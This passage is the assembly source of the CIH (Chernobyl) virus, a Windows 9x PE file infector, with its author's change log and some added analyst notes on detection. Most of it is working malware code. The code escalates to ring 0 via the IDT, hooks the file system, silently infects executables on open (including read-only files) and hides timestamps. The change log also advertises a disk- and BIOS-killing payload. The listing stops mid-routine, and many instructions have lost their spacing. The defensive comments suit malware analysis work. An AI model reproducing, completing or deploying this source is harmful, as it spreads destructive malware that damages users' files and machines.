; ****************************************************************************
; * The Virus Program Information *
; ****************************************************************************
; * *
; * Designer : CIH Source : TTIT of TATUNG in Taiwan *
; * Create Date : 04/26/1998 E-mail : WinCIH.Tatung@usa.net *
; * Modification Time : 06/01/1998 Version : 1.5 *
; * *
; * Turbo Assembler Version 5.0 : Tasm /m cih *
; * Turbo Link Version 5.01 : Tlink /3 /t cih, cih.exe *
; * *
; *==========================================================================*
; * Modification History *
; *==========================================================================*
; * v1.0 1. Create the Virus Program. *
; * 2. The Virus Modifies IDT to Get Ring0 Privilege. *
; * 04/26/1998 3. Virus Code doesn't Reload into System. *
; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *
; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. *
; * 6. When System Opens Existing PE File, the File will be *
; * Infected, and the File doesn't be Reinfected. *
; * 7. It is also Infected, even the File is Read-Only. *
; * 8. When the File is Infected, the Modification Date and Time *
; * of the File also don't be Changed. *
; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call *
; * Previous FileSystemApiHook, it will Call the Function *
; * that the IFS Manager Would Normally Call to Implement *
; * this Particular I/O Request. *
; * 10. The Virus Size is only 656 Bytes. *
; *==========================================================================*
; * v1.1 1. Especially, the File that be Infected will not Increase *
; * it's Size... ^__^ *
; * 05/15/1998 2. Hook and Modify Structured Exception Handling. *
; * When an Exception Error Occurs, the OS should be *
; * Windows NT. So My Cute Virus will not Continue to Run, *
; * it will Jump to the Original Application to Run. *
; * 3. Use Better Algorithm, Reduce Virus Code Size. *
; * 4. The Virus "Basic" Size is only 796 Bytes. *
; *==========================================================================*
; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... *
; * 2. Modify the Bug of v1.1 *
; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. *
; *==========================================================================*
; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Error. *
; * So When Open WinZip Self-Extractor ==> Don't Infect it. *
; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes. *
; *==========================================================================*
; * v1.4 1. Full Modify the Bug : WinZip Self-Extractor Occurs Error. *
; * 2. Change the Date of Killing Computers. *
; * 05/31/1998 3. Modify Virus Version Copyright. *
; * 4. The Virus "Basic" Size is 1019 Bytes. *
; ****************************************************************************
; * v1.5 1. Full Modify the Bug : Change Harddisk Killing Port *
; * 2. Modify Virus Version Copyright. *
; * 06/01/1998 3. Clear Garbage in Source Code. *
; * 4. The Virus "Small" Size in 10xx Bytes. *
; ****************************************************************************
.586
; ****************************************************************************
; * Original PE Executable File(Don't Modify this Section) *
; ****************************************************************************
OriginalAppEXE SEGMENT
FileHeader:
db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h
db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
dd00000000h, VirusSize
OriginalAppEXE ENDS
; ****************************************************************************
; * My Virus Game *
; ****************************************************************************
; *********************************************************
; * Constant Define *
; *********************************************************
; Build-time switches and constants.
; DEBUG selects which pair of values below is assembled and also gates the
; two IFDEBUG regions that appear later in this listing.
TRUE=1
FALSE=0
DEBUG=TRUE
IFDEBUG
; HookExceptionNumber is the IDT vector whose gate the ring-3 stub rewrites
; and then raises with INT; FirstKillHardDiskNumber is only referenced by the
; KillHardDisk routine.
FirstKillHardDiskNumber = 82h
HookExceptionNumber = 06h
ELSE
FirstKillHardDiskNumber = 81h
HookExceptionNumber = 04h
ENDIF
; Length passed to the UniToBCSPath call and used to size FileNameBuffer in
; the dynamic data area.
FileNameBufferSize=7fh
; *********************************************************
; *********************************************************
VirusGame SEGMENT
ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame
ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame
; *********************************************************
; * Ring3 Virus Game Initial Program *
; *********************************************************
; Ring-3 entry stub (analyst notes).
; Sequence visible below: (1) a new exception frame is linked in through
; fs:[0], with StopToRunVirusCode as its handler address; (2) SIDT is used to
; locate the IDT and the gate for HookExceptionNumber is overwritten directly
; from user mode; (3) that vector is raised with INT so MyExceptionHook runs
; (at ring 0, per the author's banner).
; The stores into the gate only succeed where the IDT is writable from user
; mode. The author's own notes say that on Windows NT the resulting fault is
; taken by the frame installed in step (1) and control goes to the original
; application instead.
; Defensive relevance: the observable side effect of this stub is a changed
; handler offset in one IDT gate; the previous offset is held in EBP and is
; written back at ExitRing0Init.
MyVirusStart:
pushebp
; *************************************
; * Let's Modify Structured Exception *
; * Handing, Prevent Exception Error *
; * Occurrence, Especially in NT. *
; *************************************
leaeax, [esp-04h*2]
xorebx, ebx
; EBX = 0, so this swaps EAX with fs:[0] (head of the exception-frame chain).
xchgeax, fs:[ebx]
; call/pop pair: EBX receives the run-time address of @0 so that later
; operands can be formed relative to it (the code cannot rely on a fixed
; load address).
call@0
@0:
popebx
leaecx, StopToRunVirusCode-@0[ebx]
pushecx
pusheax
; *************************************
; * Let's Modify *
; * IDT(Interrupt Descriptor Table) *
; * to Get Ring0 Privilege... *
; *************************************
pusheax;
sidt [esp-02h] ; Get IDT Base Address
pop ebx ;
; EBX now points 4 bytes into the 8-byte gate for HookExceptionNumber.
add ebx, HookExceptionNumber*08h+04h ; ZF = 0
cli
; EBP = original handler offset (high word from [ebx+2], low word from
; [ebx-4]); kept so the gate can be restored later.
mov ebp, [ebx] ; Get Exception Base
mov bp, [ebx-04h] ; Entry Point
lea esi, MyExceptionHook-@1[ecx]
pushesi
; The two 16-bit halves of the gate offset are replaced with the address of
; MyExceptionHook.
mov[ebx-04h], si;
shresi, 16; Modify Exception
mov[ebx+02h], si; Entry Point Address
popesi
; *************************************
; * Generate Exception to Get Ring0 *
; *************************************
intHookExceptionNumber; GenerateException
ReturnAddressOfEndException=$
; *************************************
; * Merge All Virus Code Section *
; *************************************
pushesi
movesi, eax
LoopOfMergeAllVirusCodeSection:
movecx, [eax-04h]
repmovsb
subeax, 08h
movesi, [eax]
oresi, esi
jzQuitLoopOfMergeAllVirusCodeSection ; ZF = 1
jmpLoopOfMergeAllVirusCodeSection
QuitLoopOfMergeAllVirusCodeSection:
popesi
; *************************************
; * Generate Exception Again *
; *************************************
intHookExceptionNumber; GenerateException Again
; *************************************
; * Let's Restore *
; * Structured Exception Handing *
; *************************************
ReadyRestoreSE:
sti
xorebx, ebx
jmpRestoreSE
; *************************************
; * When Exception Error Occurs, *
; * Our OS System should be in NT. *
; * So My Cute Virus will not *
; * Continue to Run, it Jumps to *
; * Original Application to Run. *
; *************************************
StopToRunVirusCode:
@1=StopToRunVirusCode
xorebx, ebx
moveax, fs:[ebx]
movesp, [eax]
RestoreSE:
popdword ptr fs:[ebx]
popeax
; *************************************
; * Return Original App to Execute *
; *************************************
popebp
push 00401000h ; Push Original
OriginalAddressOfEntryPoint=$-4; App Entry Point to Stack
ret ; Return to Original App Entry Point
; *********************************************************
; * Ring0 Virus Game Initial Program *
; *********************************************************
; Handler reached through the rewritten IDT gate (analyst notes).
; It is entered twice by the ring-3 stub. ZF on entry selects the path: the
; author annotates the first INT with "ZF = 0" (residency check / allocation)
; and the second with "ZF = 1" (hook installation).
; State kept outside normal memory: DR0 is used first as an "already
; resident" flag and then to hold the previous file-system hook pointer.
; DR0 is a hardware debug register, so this marker lives in CPU state rather
; than in a file or a named object, and it will collide with any debugger
; that uses hardware breakpoint 0.
MyExceptionHook:
@2=MyExceptionHook
jzInstallMyFileSystemApiHook
; *************************************
; * Do My Virus Exist in System !? *
; *************************************
; DR0 == 0 -> not resident yet, go allocate. Otherwise the saved return
; address on the stack is moved forward so that IRETD resumes the ring-3
; code at ReadyRestoreSE instead of right after the INT.
movecx, dr0
jecxzAllocateSystemMemoryPage
adddword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException
; *************************************
; * Return to Ring3 Initial Program *
; *************************************
; Writes the original handler offset (saved in EBP by the ring-3 stub) back
; into the IDT gate before returning.
ExitRing0Init:
mov[ebx-04h], bp;
shrebp, 16; Restore Exception
mov[ebx+02h], bp;
iretd
; *************************************
; * Allocate SystemMemory Page to Use *
; *************************************
AllocateSystemMemoryPage:
; EBX still holds the IDT-derived pointer here, so DR0 becomes non-zero.
movdr0, ebx; Set the Mark of My Virus Exist in System
; Eight dwords are pushed as arguments for the VMM _PageAllocate service and
; removed again by the ADD ESP below. ECX is zero on this path (JECXZ taken).
; NOTE(review): the meaning of each argument is not stated in this listing;
; take it from the VMM service documentation rather than from here.
push00000000fh;
pushecx;
push0ffffffffh;
pushecx;
pushecx;
pushecx;
push000000001h;
push000000002h;
int20h; VMMCALL _PageAllocate
_PageAllocate=$;
dd00010053h; Use EAX, ECX, EDX, and flags
addesp, 08h*04h
xchgedi, eax; EDI = SystemMemory Start Address
; EAX = run-time address of MyVirusStart, consumed by the ring-3 copy loop
; that follows the first INT.
leaeax, MyVirusStart-@2[esi]
iretd; Return to Ring3 Initial Program
; *************************************
; * Install My File System Api Hook *
; *************************************
InstallMyFileSystemApiHook:
leaeax, FileSystemApiHook-@6[edi]
pusheax ;
int20h ; VXDCALL IFSMgr_InstallFileSystemApiHook
IFSMgr_InstallFileSystemApiHook = $
dd 00400067h; Use EAX, ECX, EDX, and flags
movdr0, eax; Save OldFileSystemApiHook Address
popeax; EAX = FileSystemApiHook Address
; Save Old IFSMgr_InstallFileSystemApiHook Entry Point
; The dword read here is the one that follows the INT 20h above. According to
; the author's banner before LoopOfRestoreVxDCallID, VMM rewrites "int 20h +
; service id" into "call [X]" after first use, so ECX is presumably the
; address of the service's pointer slot - confirm against VMM behaviour.
; The slot's old content is saved and then replaced with the address of
; InstallFileSystemApiHook in the resident copy.
; Defensive relevance: after this point both a file-system API hook and the
; install-hook service pointer refer to addresses inside the allocated pages
; rather than inside a loaded driver image.
movecx, IFSMgr_InstallFileSystemApiHook-@2[esi]
movedx, [ecx]
movOldInstallFileSystemApiHook-@3[eax], edx
; Modify IFSMgr_InstallFileSystemApiHook Entry Point
leaeax, InstallFileSystemApiHook-@3[eax]
mov[ecx], eax
cli
jmpExitRing0Init
; *********************************************************
; * Code Size of Merge Virus Code Section *
; *********************************************************
CodeSizeOfMergeVirusCodeSection=offset $
; *********************************************************
; * IFSMgr_InstallFileSystemApiHook *
; *********************************************************
; Replacement body for the IFSMgr_InstallFileSystemApiHook service (analyst
; notes). Whenever another component registers a file-system hook, this code:
;   1. removes its own FileSystemApiHook,
;   2. forwards the caller's registration to the saved original service,
;   3. registers FileSystemApiHook again through the original service,
;   4. stores the value returned by step 3 in DR0 as the new "previous hook",
;   5. returns the value from step 2 to the caller in EAX.
; NOTE(review): re-registering after the client presumably keeps this hook
; ahead of later clients in the chain - confirm against IFSMgr ordering.
; EBX is preserved; ECX is used as scratch to drop the pushed arguments.
InstallFileSystemApiHook:
pushebx
; call/pop pair to obtain the run-time address, then adjust to
; FileSystemApiHook.
call@4;
@4:;
popebx; mov ebx, offset FileSystemApiHook
addebx, FileSystemApiHook-@4;
pushebx
int20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook
IFSMgr_RemoveFileSystemApiHook=$
dd 00400068h; Use EAX, ECX, EDX, and flags
popeax
; Call Original IFSMgr_InstallFileSystemApiHook
; to Link Client FileSystemApiHook
; [esp+8] is the caller's argument (above the saved EBX and return address).
pushdword ptr [esp+8]
callOldInstallFileSystemApiHook-@3[ebx]
popecx
; Keep the client's result so it can be returned unchanged.
pusheax
; Call Original IFSMgr_InstallFileSystemApiHook
; to Link My FileSystemApiHook
pushebx
callOldInstallFileSystemApiHook-@3[ebx]
popecx
movdr0, eax; Adjust OldFileSystemApiHook Address
popeax
popebx
ret
; *********************************************************
; *Static Data *
; *********************************************************
OldInstallFileSystemApiHookdd?
; *********************************************************
; * IFSMgr_FileSystemHook *
; *********************************************************
; *************************************
; * IFSMgr_FileSystemHook Entry Point *
; *************************************
FileSystemApiHook:
@3=FileSystemApiHook
pushad
call @5;
@5:;
pop esi; mov esi, offset VirusGameDataStartAddress
add esi, VirusGameDataStartAddress-@5
; *************************************
; * Is OnBusy !? *
; *************************************
testbyte ptr (OnBusy-@6)[esi], 01h; if ( OnBusy )
jnzpIFSFunc; goto pIFSFunc
; *************************************
; * Is OpenFile !? *
; *************************************
; if ( NotOpenFile )
; goto prevhook
leaebx, [esp+20h+04h+04h]
cmpdword ptr [ebx], 00000024h
jneprevhook
; *************************************
; * Enable OnBusy *
; *************************************
incbyte ptr (OnBusy-@6)[esi]; Enable OnBusy
; *************************************
; * Get FilePath's DriveNumber, *
; * then Set the DriveName to *
; * FileNameBuffer. *
; *************************************
; * Ex. If DriveNumber is 03h, *
; * DriveName is 'C:'. *
; *************************************
addesi, FileNameBuffer-@6
pushesi
moval, [ebx+04h]
cmpal, 0ffh
jeCallUniToBCSPath
addal, 40h
movah, ':'
mov[esi], eax
incesi
incesi
; *************************************
; * UniToBCSPath *
; *************************************
; * This Service Converts *
; * a Canonicalized Unicode Pathname *
; * to a Normal Pathname in the *
; * Specified BCS Character Set. *
; *************************************
CallUniToBCSPath:
push00000000h
pushFileNameBufferSize
movebx, [ebx+10h]
moveax, [ebx+0ch]
addeax, 04h
pusheax
pushesi
int20h; VXDCall UniToBCSPath
UniToBCSPath=$
dd00400041h
addesp, 04h*04h
; *************************************
; * Is FileName '.EXE' !? *
; *************************************
cmp[esi+eax-04h], 'EXE.'
popesi
jneDisableOnBusy
IFDEBUG
; *************************************
; * Only for Debug *
; *************************************
cmp[esi+eax-06h], 'KCUF'
jneDisableOnBusy
ENDIF
; *************************************
; * Is Open Existing File !? *
; *************************************
; if ( NotOpenExistingFile )
; goto DisableOnBusy
cmpword ptr [ebx+18h], 01h
jneDisableOnBusy
; *************************************
; * Get Attributes of the File *
; *************************************
movax, 4300h
int20h; VXDCall IFSMgr_Ring0_FileIO
IFSMgr_Ring0_FileIO=$
dd00400032h
jcDisableOnBusy
pushecx
; *************************************
; * Get IFSMgr_Ring0_FileIO Address *
; *************************************
movedi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi]
movedi, [edi]
; *************************************
; * Is Read-Only File !? *
; *************************************
testcl, 01h
jzOpenFile
; *************************************
; * Modify Read-Only File to Write *
; *************************************
movax, 4301h
xorecx, ecx
calledi; VXDCall IFSMgr_Ring0_FileIO
; *************************************
; * Open File *
; *************************************
OpenFile:
xoreax, eax
movah, 0d5h
xorecx, ecx
xoredx, edx
incedx
movebx, edx
incebx
calledi; VXDCall IFSMgr_Ring0_FileIO
xchgebx, eax; mov ebx, FileHandle
; *************************************
; * Need to Restore *
; * Attributes of the File !? *
; *************************************
popecx
pushf
testcl, 01h
jzIsOpenFileOK
; *************************************
; * Restore Attributes of the File *
; *************************************
movax, 4301h
calledi; VXDCall IFSMgr_Ring0_FileIO
; *************************************
; * Is Open File OK !? *
; *************************************
; Post-open checks: is the file a PE image, and is it already marked?
; (analyst notes)
; Two 4-byte reads are issued through the IFSMgr_Ring0_FileIO pointer in EDI:
;   - at file offset 3Ch, which yields the offset of the new (PE) header;
;   - at (that offset - 1), i.e. starting one byte BEFORE the signature.
; The compare against 00455000h therefore accepts only the byte sequence
; 00 'P' 'E' 00: a PE signature whose preceding byte is zero.
; Defensive relevance: the byte immediately before the PE signature acts as
; the infection marker. The infection path that follows queues a 1-byte write
; to this same file offset, so a non-zero byte at (new-header offset - 1) is a
; cheap triage indicator for this family. It is not sufficient on its own and
; should be confirmed with a full signature match.
IsOpenFileOK:
; Flags saved right after the open call; CF set means the open failed.
popf
jcDisableOnBusy
; *************************************
; * Open File Already Succeed. ^__^ *
; *************************************
pushesi; Push FileNameBuffer Address to Stack
pushf; Now CF = 0, Push Flag to Stack
addesi, DataBuffer-@7 ; mov esi, offset DataBuffer
; ***************************
; * Get OffsetTonewHeader *
; ***************************
; EAX = 0D600h (the author's register table labels this "Read Data in File").
xoreax, eax
movah, 0d6h
; For Doing Minimal VirusCode's Length,
; I Save EAX to EBP.
movebp, eax
; ECX = 4 (byte count), EDX = 3Ch (file offset), ESI = destination buffer.
push00000004h
popecx
push0000003ch
popedx
calledi; VXDCall IFSMgr_Ring0_FileIO
; EDX = value just read = file offset of the new header.
movedx, [esi]
; ***************************
; * Get 'PE\0' Signature *
; * of ImageFileHeader, and *
; * Infected Mark. *
; ***************************
; Step back one byte so the marker byte and the first three signature bytes
; land in the same dword.
decedx
moveax, ebp
calledi; VXDCall IFSMgr_Ring0_FileIO
; ***************************
; * Is PE !? *
; ***************************
; * Is the File *
; * Already Infected !? *
; ***************************
; * WinZip Self-Extractor *
; * doesn't Have Infected *
; * Mark Because My Virus *
; * doesn't Infect it. *
; ***************************
; Little-endian 00455000h = bytes 00 50 45 00.
cmpdword ptr [esi], 00455000h
jneCloseFile
; *************************************
; * The File is ^o^ *
; * PE(Portable Executable) indeed. *
; *************************************
; * The File isn't also Infected. *
; *************************************
; *************************************
; * Start to Infect the File *
; *************************************
; * Registers Use Status Now : *
; * *
; * EAX = 04h *
; * EBX = File Handle *
; * ECX = 04h *
; * EDX = 'PE\0\0' Signature of *
; * ImageFileHeader Pointer's *
; * Former Byte. *
; * ESI = DataBuffer Address ==> @8 *
; * EDI = IFSMgr_Ring0_FileIO Address *
; * EBP = D600h ==> Read Data in File *
; *************************************
; * Stack Dump : *
; * *
; * ESP => ------------------------- *
; * | EFLAG(CF=0) | *
; * ------------------------- *
; * | FileNameBufferPointer | *
; * ------------------------- *
; * | EDI | *
; * ------------------------- *
; * | ESI | *
; * ------------------------- *
; * | EBP | *
; * ------------------------- *
; * | ESP | *
; * ------------------------- *
; * | EBX | *
; * ------------------------- *
; * | EDX | *
; * ------------------------- *
; * | ECX | *
; * ------------------------- *
; * | EAX | *
; * ------------------------- *
; * | Return Address | *
; * ------------------------- *
; *************************************
pushebx; Save File Handle
push00h; Set VirusCodeSectionTableEndMark
; ***************************
; * Let's Set the *
; * Virus' Infected Mark *
; ***************************
push01h; Size
pushedx; Pointer of File
pushedi; Address of Buffer
; ***************************
; * Save ESP Register *
; ***************************
movdr1, esp
; ***************************
; * Let's Set the *
; * NewAddressOfEntryPoint *
; * ( Only First Set Size ) *
; ***************************
pusheax; Size
; ***************************
; * Let's Read *
; * Image Header in File *
; ***************************
moveax, ebp
movcl, SizeOfImageHeaderToRead
addedx, 07h ; Move EDX to NumberOfSections
calledi ; VXDCall IFSMgr_Ring0_FileIO
; ***************************
; * Let's Set the *
; * NewAddressOfEntryPoint *
; * ( Set Pointer of File, *
; * Address of Buffer ) *
; ***************************
leaeax, (AddressOfEntryPoint-@8)[edx]
pusheax; Pointer of File
leaeax, (NewAddressOfEntryPoint-@8)[esi]
pusheax; Address of Buffer
; ***************************
; * Move EDX to the Start *
; * of SectionTable in File *
; ***************************
movzxeax, word ptr (SizeOfOptionalHeader-@8)[esi]
leaedx, [eax+edx+12h]
; ***************************
; * Let's Get *
; * Total Size of Sections *
; ***************************
moval, SizeOfScetionTable
; I Assume NumberOfSections <= 0ffh
movcl, (NumberOfSections-@8)[esi]
mulcl
; ***************************
; * Let's Set Section Table *
; ***************************
; Move ESI to the Start of SectionTable
leaesi, (StartOfSectionTable-@8)[esi]
pusheax; Size
pushedx; Pointer of File
pushesi; Address of Buffer
; ***************************
; * The Code Size of Merge *
; * Virus Code Section and *
; * Total Size of Virus *
; * Code Section Table Must *
; * be Small or Equal the *
; * Unused Space Size of *
; * Following Section Table *
; ***************************
incecx
pushecx; Save NumberOfSections+1
shlecx, 03h
pushecx; Save TotalSizeOfVirusCodeSectionTable
addecx, eax
addecx, edx
subecx, (SizeOfHeaders-@9)[esi]
notecx
incecx
; Save My Virus First Section Code
; Size of Following Section Table...
; ( Not Include the Size of Virus Code Section Table )
pushecx
xchgecx, eax; ECX = Size of Section Table
; Save Original Address of Entry Point
moveax, (AddressOfEntryPoint-@9)[esi]
addeax, (ImageBase-@9)[esi]
mov(OriginalAddressOfEntryPoint-@9)[esi], eax
cmpword ptr [esp], small CodeSizeOfMergeVirusCodeSection
jlOnlySetInfectedMark
; ***************************
; * Read All Section Tables *
; ***************************
moveax, ebp
calledi; VXDCall IFSMgr_Ring0_FileIO
; ***************************
; * Full Modify the Bug : *
; * WinZip Self-Extractor *
; * Occurs Error... *
; ***************************
; * So When User Opens *
; * WinZip Self-Extractor, *
; * Virus Doesn't Infect it.*
; ***************************
; * First, Virus Gets the *
; * PointerToRawData in the *
; * Second Section Table, *
; * Reads the Section Data, *
; * and Tests the String of *
; * 'WinZip(R)'...... *
; ***************************
xchgeax, ebp
push00000004h
popecx
pushedx
movedx, (SizeOfScetionTable+PointerToRawData-@9)[esi]
addedx, 12h
calledi; VXDCall IFSMgr_Ring0_FileIO
cmp dword ptr [esi], 'piZniW'
jeNotSetInfectedMark
popedx
; ***************************
; * Let's Set Total Virus *
; * Code Section Table *
; ***************************
; EBX = My Virus First Section Code
;Size of Following Section Table
popebx
popedi; EDI = TotalSizeOfVirusCodeSectionTable
popecx; ECX = NumberOfSections+1
pushedi; Size
addedx, ebp
pushedx; Pointer of File
addebp, esi
pushebp; Address of Buffer
; ***************************
; * Set the First Virus *
; * Code Section Size in *
; * VirusCodeSectionTable *
; ***************************
leaeax, [ebp+edi-04h]
mov[eax], ebx
; ***************************
; * Let's Set My Virus *
; * First Section Code *
; ***************************
pushebx; Size
addedx, edi
pushedx; Pointer of File
leaedi, (MyVirusStart-@9)[esi]
pushedi; Address of Buffer
; ***************************
; * Let's Modify the *
; * AddressOfEntryPoint to *
; * My Virus Entry Point *
; ***************************
mov(NewAddressOfEntryPoint-@9)[esi], edx
; ***************************
; * Setup Initial Data *
; ***************************
leaedx, [esi-SizeOfScetionTable]
movebp, offset VirusSize
jmpStartToWriteCodeToSections
; ***************************
; * Write Code to Sections *
; ***************************
LoopOfWriteCodeToSections:
addedx, SizeOfScetionTable
movebx, (SizeOfRawData-@9)[edx]
subebx, (VirtualSize-@9)[edx]
jbeEndOfWriteCodeToSections
pushebx; Size
subeax, 08h
mov[eax], ebx
movebx, (PointerToRawData-@9)[edx]
addebx, (VirtualSize-@9)[edx]
pushebx; Pointer of File
pushedi; Address of Buffer
movebx, (VirtualSize-@9)[edx]
addebx, (VirtualAddress-@9)[edx]
addebx, (ImageBase-@9)[esi]
mov[eax+4], ebx
movebx, [eax]
add(VirtualSize-@9)[edx], ebx
; Section contains initialized data ==> 00000040h
; Section can be Read. ==> 40000000h
or(Characteristics-@9)[edx], 40000040h
StartToWriteCodeToSections:
subebp, ebx
jbeSetVirusCodeSectionTableEndMark
addedi, ebx; Move Address of Buffer
EndOfWriteCodeToSections:
loopLoopOfWriteCodeToSections
; ***************************
; * Only Set Infected Mark *
; ***************************
OnlySetInfectedMark:
movesp, dr1
jmpWriteVirusCodeToFile
; ***************************
; * Not Set Infected Mark *
; ***************************
NotSetInfectedMark:
addesp, 3ch
jmpCloseFile
; ***************************
; * Set Virus Code *
; * Section Table End Mark *
; ***************************
SetVirusCodeSectionTableEndMark:
; Adjust Size of Virus Section Code to Correct Value
add[eax], ebp
add[esp+08h], ebp
; Set End Mark
xorebx, ebx
mov[eax-04h], ebx
; ***************************
; * When VirusGame Calls *
; * VxDCall, VMM Modifies *
; * the 'int 20h' and the *
; * 'Service Identifier' *
; * to 'Call [XXXXXXXX]'. *
; ***************************
; * Before Writing My Virus *
; * to File, I Must Restore *
; * them First. ^__^ *
; ***************************
leaeax, (LastVxDCallAddress-2-@9)[esi]
movcl, VxDCallTableSize
LoopOfRestoreVxDCallID:
movword ptr [eax], 20cdh
movedx, (VxDCallIDTable+(ecx-1)*04h-@9)[esi]
mov[eax+2], edx
movzxedx, byte ptr (VxDCallAddressTable+ecx-1-@9)[esi]
subeax, edx
loopLoopOfRestoreVxDCallID
; ***************************
; * Let's Write *
; * Virus Code to the File *
; ***************************
WriteVirusCodeToFile:
moveax, dr1
movebx, [eax+10h]
movedi, [eax]
LoopOfWriteVirusCodeToFile:
popecx
jecxzSetFileModificationMark
movesi, ecx
moveax, 0d601h
popedx
popecx
calledi; VXDCall IFSMgr_Ring0_FileIO
jmpLoopOfWriteVirusCodeToFile
; ***************************
; * Let's Set CF = 1 ==> *
; * Need to Restore File *
; * Modification Time *
; ***************************
SetFileModificationMark:
popebx
popeax
stc; Enable CF(Carry Flag)
pushf
; *************************************
; * Close File *
; *************************************
CloseFile:
xoreax, eax
movah, 0d7h
calledi; VXDCall IFSMgr_Ring0_FileIO
; *************************************
; * Need to Restore File Modification *
; * Time !? *
; *************************************
popf
popesi
jncIsKillComputer
; *************************************
; * Restore File Modification Time *
; *************************************
movebx, edi
movax, 4303h
movecx, (FileModificationTime-@7)[esi]
movedi, (FileModificationTime+2-@7)[esi]
callebx; VXDCall IFSMgr_Ring0_FileIO
; *************************************
; * Disable OnBusy *
; *************************************
DisableOnBusy:
decbyte ptr (OnBusy-@7)[esi]; Disable OnBusy
; *************************************
; * Call Previous FileSystemApiHook *
; *************************************
prevhook:
popad
moveax, dr0;
jmp[eax]; Jump to prevhook
; *************************************
; * Call the Function that the IFS *
; * Manager Would Normally Call to *
; * Implement this Particular I/O *
; * Request. *
; *************************************
pIFSFunc:
movebx, esp
pushdword ptr [ebx+20h+04h+14h]; Push pioreq
call[ebx+20h+04h]; Call pIFSFunc
popecx;
mov[ebx+1ch], eax; Modify EAX Value in Stack
; ***************************
; * After Calling pIFSFunc, *
; * Get Some Data from the *
; * Returned pioreq. *
; ***************************
cmpdword ptr [ebx+20h+04h+04h], 00000024h
jneQuitMyVirusFileSystemHook
; *****************
; * Get the File *
; * Modification *
; * Date and Time *
; * in DOS Format.*
; *****************
moveax, [ecx+28h]
